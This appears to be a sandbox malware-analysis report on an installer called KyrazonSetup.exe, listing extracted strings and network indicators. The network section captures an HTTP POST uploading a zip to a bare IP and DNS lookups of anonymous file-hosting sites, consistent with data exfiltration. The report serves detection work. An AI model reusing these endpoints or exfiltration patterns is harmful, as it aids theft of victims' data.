Source: C:\Users\user\Desktop\KyrazonSetup.exeFile opened: C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\7z-out\resources\app.asar.unpacked\node_modulesJump to behavior
Source: C:\Users\user\Desktop\KyrazonSetup.exeFile opened: C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\7z-out\resources\app.asar.unpackedJump to behavior
Source: C:\Users\user\Desktop\KyrazonSetup.exeFile opened: C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\7z-out\resources\app.asar.unpacked\node_modules\windows-shortcutsJump to behavior
Source: C:\Users\user\Desktop\KyrazonSetup.exeFile opened: C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\7z-out\localesJump to behavior
Source: global trafficTCP traffic: 192.168.2.4:49528 -> 1.1.1.1:53
Source: Joe Sandbox ViewIP Address: 162.159.61.3 162.159.61.3
Source: Joe Sandbox ViewIP Address: 45.55.107.24 45.55.107.24
Source: Joe Sandbox ViewIP Address: 162.159.135.232 162.159.135.232
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 92.246.138.20
Source: unknownTCP traffic detected without corresponding DNS query: 92.246.138.20
Source: unknownTCP traffic detected without corresponding DNS query: 92.246.138.20
Source: unknownTCP traffic detected without corresponding DNS query: 92.246.138.20
Source: unknownTCP traffic detected without corresponding DNS query: 92.246.138.20
Source: unknownTCP traffic detected without corresponding DNS query: 92.246.138.20
Source: unknownTCP traffic detected without corresponding DNS query: 92.246.138.20
Source: unknownTCP traffic detected without corresponding DNS query: 92.246.138.20
Source: unknownTCP traffic detected without corresponding DNS query: 92.246.138.20
Source: unknownTCP traffic detected without corresponding DNS query: 92.246.138.20
Source: unknownTCP traffic detected without corresponding DNS query: 92.246.138.20
Source: unknownTCP traffic detected without corresponding DNS query: 92.246.138.20
Source: unknownTCP traffic detected without corresponding DNS query: 92.246.138.20
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficDNS traffic detected: DNS query: chrome.cloudflare-dns.com
Source: global trafficDNS traffic detected: DNS query: oshi.at
Source: global trafficDNS traffic detected: DNS query: tempfile.me
Source: global trafficDNS traffic detected: DNS query: api.gofile.io
Source: global trafficDNS traffic detected: DNS query: file.io
Source: global trafficDNS traffic detected: DNS query: zerostone.discloud.app
Source: global trafficDNS traffic detected: DNS query: discord.com
Source: unknownHTTP traffic detected: POST /storage HTTP/1.1Accept: application/json, text/plain, */*Content-Type: multipart/form-data; boundary=--------------------------229700368627596606758153User-Agent: axios/1.7.2Content-Length: 2931Accept-Encoding: gzip, compress, deflate, brHost: 92.246.138.20Connection: closeData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 32 32 39 37 30 30 33 36 38 36 32 37 35 39 36 36 30 36 37 35 38 31 35 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 38 33 33 33 64 34 38 31 2d 34 61 65 34 2d 34 66 32 63 2d 62 63 62 39 2d 37 61 62 66 32 32 31 66 31 31 31 63 2e 7a 69 70 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 7a 69 70 0d 0a 0d 0a Data Ascii: ----------------------------229700368627596606758153Content-Disposition: form-data; name="file"; filename="8333d481-4ae4-4f2c-bcb9-7abf221f111c.zip"Content-Type: application/zip
Source: KyrazonSetup.exe, 00000000.00000003.1871258931.0000000004FA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://blog.izs.me)
Source: KyrazonSetup.exe, 00000000.00000003.1871258931.0000000004FA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://blog.izs.me/)
Source: KyrazonSetup.exe, 00000000.00000003.1863909793.0000000004FA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cldr.unicode.org/index/downloads
Source: KyrazonSetup.exe, 00000000.00000003.1863909793.0000000004FA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://code.google.com/p/smhasher/
Source: KyrazonSetup.exe, 00000000.00000003.1863909793.0000000004FA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://code.google.com/p/v8
Source: KyrazonSetup.exe, 00000000.00000003.1863909793.0000000004FA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://devel.freebsoft.org/speechd
Source: KyrazonSetup.exe, 00000000.00000003.1863909793.0000000004FA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://developer.android.com/tools/extras/support-library.html
Source: KyrazonSetup.exe, 00000000.00000003.1871258931.0000000004FA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.python.org/library/uuid.html
Source: KyrazonSetup.exe, 00000000.00000003.1871258931.0000000004FA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://dominictarr.com)
Source: KyrazonSetup.exe, 00000000.00000003.1865836497.000000000078C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://eksempel.dk
Source: KyrazonSetup.exe, 00000000.00000003.1863909793.0000000004FA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://freedesktop.org
Source: KyrazonSetup.exe, 00000000.00000003.1863909793.0000000004FA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://git.linuxtv.org/v4l-utils.git
Source: KyrazonSetup.exe, 00000000.00000003.1863909793.0000000004FA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://google.github.io/snappy/
Source: KyrazonSetup.exe, 00000000.00000003.1871258931.0000000004FA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ljharb.codes
Source: KyrazonSetup.exe, KyrazonSetup.exe, 00000000.00000000.1642686865.000000000040A000.00000008.00000001.01000000.00000003.sdmp, KyrazonSetup.exe, 00000000.00000002.1919722258.000000000040A000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: KyrazonSetup.exe, 00000000.00000000.1642686865.000000000040A000.00000008.00000001.01000000.00000003.sdmp, KyrazonSetup.exe, 00000000.00000002.1919722258.000000000040A000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: KyrazonSetup.exe, 00000000.00000003.1863909793.0000000004FA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://opensource.perlig.de/rjsmin/
Source: KyrazonSetup.exe, 00000000.00000003.1871258931.0000000004FA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pajhome.org.uk/crypt/md5
Source: KyrazonSetup.exe, 00000000.00000003.1869513927.000000000078C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://primer.com
Source: KyrazonSetup.exe, 00000000.00000003.1871258931.0000000004FA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://re-becca.org/)
Source: KyrazonSetup.exe, 00000000.00000003.1863909793.0000000004FA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://source.android.com/
Source: KyrazonSetup.exe, 00000000.00000003.1863909793.0000000004FA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://source.android.com/compatibility)
Source: KyrazonSetup.exe, 00000000.00000003.1863909793.0000000004FA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://src.chromium.org/viewvc/chrome/trunk/deps/third_party/xz/COPYING
Source: KyrazonSetup.exe, 00000000.00000003.1863909793.0000000004FA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://tukaani.org/xz/
Source: KyrazonSetup.exe, 00000000.00000003.1863909793.0000000004FA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://valgrind.org
Source: KyrazonSetup.exe, 00000000.00000003.1863909793.0000000004FA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://webkit.org/
Source: KyrazonSetup.exe, 00000000.00000003.1863909793.0000000004FA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://website-archive.mozilla.org/www.mozilla.org/mpl/MPL/NPL/1.1/):
Source: KyrazonSetup.exe, 00000000.00000003.1863909793.0000000004FA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/
Source: KyrazonSetup.exe, 00000000.00000003.1863909793.0000000004FA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: KyrazonSetup.exe, 00000000.00000003.1863909793.0000000004FA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.chromium.org
Source: KyrazonSetup.exe, 00000000.00000003.1863909793.0000000004FA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.freedesktop.org/wiki/Software/xdg-user-dirs
Source: KyrazonSetup.exe, 00000000.00000003.1863909793.0000000004FA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.gutenberg.org/ebooks/53).
Source: KyrazonSetup.exe, 00000000.00000003.1863909793.0000000004FA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.linux-usb.org/usb-ids.html
Source: KyrazonSetup.exe, 00000000.00000003.1871258931.0000000004FA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.movable-type.co.uk/scripts/sha1.html
Source: KyrazonSetup.exe, 00000000.00000003.1863909793.0000000004FA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.mozilla.org/MPL/
Source: KyrazonSetup.exe, 00000000.00000003.1863909793.0000000004FA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.mozilla.org/NPL/
Source: KyrazonSetup.exe, 00000000.00000003.1863909793.0000000004FA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.opensource.org/licenses/bsd-license.php
Source: KyrazonSetup.exe, 00000000.00000003.1863909793.0000000004FA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ploscompbiol.org/static/license
Source: KyrazonSetup.exe, 00000000.00000003.1863909793.0000000004FA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.strongtalk.org/
Source: KyrazonSetup.exe, 00000000.00000003.1863909793.0000000004FA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.suitable.com
Source: KyrazonSetup.exe, 00000000.00000003.1863909793.0000000004FA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.suitable.com/tools/smslib.html
Source: KyrazonSetup.exe, 00000000.00000003.1863909793.0000000004FA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.suitable.com/tools/smslib.html>
Source: KyrazonSetup.exe, 00000000.00000003.1863909793.0000000004FA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.webrtc.org
Source: KyrazonSetup.exe, 00000000.00000003.1863909793.0000000004FA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zlib.net/
Source: KyrazonSetup.exe, 00000000.00000003.1863909793.0000000004FA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://android.googlesource.com/platform/external/puffin
Source: KyrazonSetup.exe, 00000000.00000003.1863909793.0000000004FA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://android.googlesource.com/platform/external/setupdesign/
Source: KyrazonSetup.exe, 00000000.00000003.1871258931.0000000004FA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://blueimp.net
Source: KyrazonSetup.exe, 00000000.00000003.1865202594.000000000078C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=am&category=theme81https://myactivity.google.com/myactivity/?u
Source: KyrazonSetup.exe, 00000000.00000003.1865285589.000000000078C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=ar&category=theme81https://myactivity.google.com/myactivity/?u
Source: KyrazonSetup.exe, 00000000.00000003.1865378931.000000000078C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=bg&category=theme81https://myactivity.google.com/myactivity/?u
Source: KyrazonSetup.exe, 00000000.00000003.1865618670.000000000078C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=cs&category=theme81https://myactivity.google.com/myactivity/?u
Source: KyrazonSetup.exe, 00000000.00000003.1867236925.000000000078C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=fil&category=theme81https://myactivity.google.com/myactivity/?
Source: KyrazonSetup.exe, 00000000.00000003.1867341262.000000000078C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=fr&category=theme81https://myactivity.google.com/myactivity/?u
Source: KyrazonSetup.exe, 00000000.00000003.1867529465.000000000078C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=he&category=theme81https://myactivity.google.com/myactivity/?u
Source: KyrazonSetup.exe, 00000000.00000003.1867762159.000000000078C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=hu&category=theme81https://myactivity.google.com/myactivity/?u
Source: KyrazonSetup.exe, 00000000.00000003.1868008888.000000000078C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=ja&category=theme81https://myactivity.google.com/myactivity/?u
Source: KyrazonSetup.exe, 00000000.00000003.1868387309.000000000078C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=lt&category=theme81https://myactivity.google.com/myactivity/?u
Source: KyrazonSetup.exe, 00000000.00000003.1868481609.000000000078C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=lv&category=theme81https://myactivity.google.com/myactivity/?u
Source: KyrazonSetup.exe, 00000000.00000003.1869039215.000000000078C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=pl&category=theme81https://myactivity.google.com/myactivity/?u
Source: KyrazonSetup.exe, 00000000.00000003.1869435244.000000000078C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=sk&category=theme81https://myactivity.google.com/myactivity/?u
Source: KyrazonSetup.exe, 00000000.00000003.1869594991.000000000078C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=sr&category=theme81https://myactivity.google.com/myactivity/?u
Source: KyrazonSetup.exe, 00000000.00000003.1870828493.000000000078C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=ur&category=theme81https://myactivity.google.com/myactivity/?u
Source: KyrazonSetup.exe, 00000000.00000003.1870919071.000000000078C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=vi&category=theme81https://myactivity.google.com/myactivity/?u
Source: KyrazonSetup.exe, 00000000.00000003.1868387309.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1867236925.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1867341262.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1865618670.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1869435244.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1869039215.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1870919071.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1868481609.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1867762159.000000000078C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chromeenterprise.google/policies/#BrowserSwitcherEnabled
Source: KyrazonSetup.exe, 00000000.00000003.1868387309.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1867236925.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1867341262.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1865618670.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1869435244.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1869039215.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1870919071.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1868481609.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1867762159.000000000078C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chromeenterprise.google/policies/#BrowserSwitcherExternalGreylistUrl
Source: KyrazonSetup.exe, 00000000.00000003.1868387309.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1867236925.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1867341262.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1865618670.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1869435244.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1869039215.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1870919071.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1868481609.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1867762159.000000000078C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chromeenterprise.google/policies/#BrowserSwitcherExternalSitelistUrl
Source: KyrazonSetup.exe, 00000000.00000003.1868387309.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1867236925.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1867341262.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1865618670.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1869435244.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1869039215.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1870919071.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1868481609.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1867762159.000000000078C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chromeenterprise.google/policies/#BrowserSwitcherUrlGreylist
Source: KyrazonSetup.exe, 00000000.00000003.1868387309.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1867236925.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1867341262.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1865618670.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1869435244.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1869039215.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1870919071.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1868481609.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1867762159.000000000078C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chromeenterprise.google/policies/#BrowserSwitcherUrlList
Source: KyrazonSetup.exe, 00000000.00000003.1868387309.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1867236925.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1867341262.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1865618670.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1869435244.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1869039215.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1870919071.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1868481609.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1867762159.000000000078C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chromeenterprise.google/policies/#BrowserSwitcherUseIeSitelist
Source: KyrazonSetup.exe, 00000000.00000003.1868301732.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1866823126.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1865378931.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1869169312.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1868387309.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1870828493.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1867926612.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1868835634.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1865202594.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1867341262.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1865836497.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1870648405.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1865618670.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1866034713.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1866565978.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1869679539.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1867529465.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1869316179.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1870484257.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1869435244.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1870744650.000000000078C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chromestatus.com/features#browsers.chrome.status%3A%22Deprecated%22
Source: KyrazonSetup.exe, 00000000.00000003.1863909793.0000000004FA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chromium.googlesource.com/chromium/src/
Source: KyrazonSetup.exe, 00000000.00000003.1863909793.0000000004FA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chromium.googlesource.com/vulkan-deps/
Source: KyrazonSetup.exe, 00000000.00000003.1863909793.0000000004FA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chromium.googlesource.com/webm/libwebm
Source: KyrazonSetup.exe, 00000000.00000003.1863909793.0000000004FA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chromium.googlesource.com/webm/libwebp
Source: KyrazonSetup.exe, 00000000.00000003.1863909793.0000000004FA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://creativecommons.org/licenses/by/3.0/
Source: KyrazonSetup.exe, 00000000.00000003.1863909793.0000000004FA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://developers.google.com/android/guides/setup
Source: KyrazonSetup.exe, 00000000.00000003.1865836497.000000000078C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://eksempel.dk.Brug
Source: KyrazonSetup.exe, 00000000.00000003.1863909793.0000000004FA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Cyan4973/xxHash
Source: KyrazonSetup.exe, 00000000.00000003.1863909793.0000000004FA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/GPUOpen-LibrariesAndSDKs/VulkanMemoryAllocator
Source: KyrazonSetup.exe, 00000000.00000003.1863909793.0000000004FA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/GoogleChromeLabs/text-fragments-polyfill
Source: KyrazonSetup.exe, 00000000.00000003.1863909793.0000000004FA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/KhronosGroup/SPIRV-Headers.git
Source: KyrazonSetup.exe, 00000000.00000003.1863909793.0000000004FA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/KhronosGroup/SPIRV-Tools.git
Source: KyrazonSetup.exe, 00000000.00000003.1863909793.0000000004FA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/KhronosGroup/Vulkan-Headers
Source: KyrazonSetup.exe, 00000000.00000003.1863909793.0000000004FA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/KhronosGroup/Vulkan-Loader
Source: KyrazonSetup.exe, 00000000.00000003.1871258931.0000000004FA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/LiosK/UUID.js
Source: KyrazonSetup.exe, 00000000.00000003.1863909793.0000000004FA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Maratyszcza/pthreadpool
Source: KyrazonSetup.exe, 00000000.00000003.1863909793.0000000004FA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/SeleniumHQ/selenium/tree/trunk
Source: KyrazonSetup.exe, 00000000.00000003.1863909793.0000000004FA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Squirrel/Squirrel.Mac
Source: KyrazonSetup.exe, 00000000.00000003.1863909793.0000000004FA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/aawc/unrar.git
Source: KyrazonSetup.exe, 00000000.00000003.1871258931.0000000004FA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/blueimp/JavaScript-MD5
Source: KyrazonSetup.exe, 00000000.00000003.1871258931.0000000004FA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/chalk/wrap-ansi?sponsor=1
Source: KyrazonSetup.exe, 00000000.00000003.1871258931.0000000004FA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/dominictarr/varstruct
Source: KyrazonSetup.exe, 00000000.00000003.1871258931.0000000004FA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/dominictarr/varstruct.git
Source: KyrazonSetup.exe, 00000000.00000003.1863909793.0000000004FA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/facebook/zstd
Source: KyrazonSetup.exe, 00000000.00000003.1863909793.0000000004FA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/google/diff-match-patch/tree/master/javascript
Source: KyrazonSetup.exe, 00000000.00000003.1863909793.0000000004FA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/google/distributed_point_functions
Source: KyrazonSetup.exe, 00000000.00000003.1863909793.0000000004FA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/google/google-api-cpp-client/
Source: KyrazonSetup.exe, 00000000.00000003.1863909793.0000000004FA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/google/pprof/tree/master/proto
Source: KyrazonSetup.exe, 00000000.00000003.1863909793.0000000004FA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/google/private-join-and-compute
